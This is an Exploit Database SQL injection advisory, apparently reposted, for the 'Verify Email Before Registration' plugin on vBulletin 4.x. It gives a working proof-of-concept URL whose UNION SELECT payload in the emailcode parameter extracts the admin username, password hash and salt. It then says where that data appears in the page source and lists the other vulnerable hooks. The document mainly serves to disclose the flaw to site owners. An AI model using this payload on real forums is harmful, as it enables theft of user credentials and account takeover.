vBulletin 4.x Verify Email Before Registration Plugin – SQL Injection

• Exploit Database
• 33 阅读

• 作者： Dave
  日期： 2014-09-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34717/

• #Title: vBulletin Verify Email Before Registration Plugin - SQL Injection
  #Date: September 19 2014
  #Version: Any vBulletin 4.*.* version which has the plugin installed.
  #Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164
  #Author: Dave (FW/FG)
  
  The vulnerability resides in the register_form_complete hook, and some 
  other hooks.
  The POST/GET data is not sanitized before being used in queries.
  
  SQL injection at:
  http://example.com/register.php?so=1&emailcode=[sqli]
  
  PoC:
  http://example.com/register.php?so=1&emailcode=1' UNION SELECT null, 
  concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM 
  user WHERE userid = '1
  
  Now look at the source of the page and find:
  <input type="text" style="display: none" name="email" id="email" 
  maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">
  <input type="text" style="display: none" name="emailconfirm" id="email" 
  maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">
  
  Vulnerable hooks:
  profile_updatepassword_complete (Email field when you want to change 
  your email address after being logged in.)
  register_addmember_complete (After submitting the final registration form.)
  register_addmember_process
  register_form_complete (This example)
  register_start (Email confirmation form at register.php)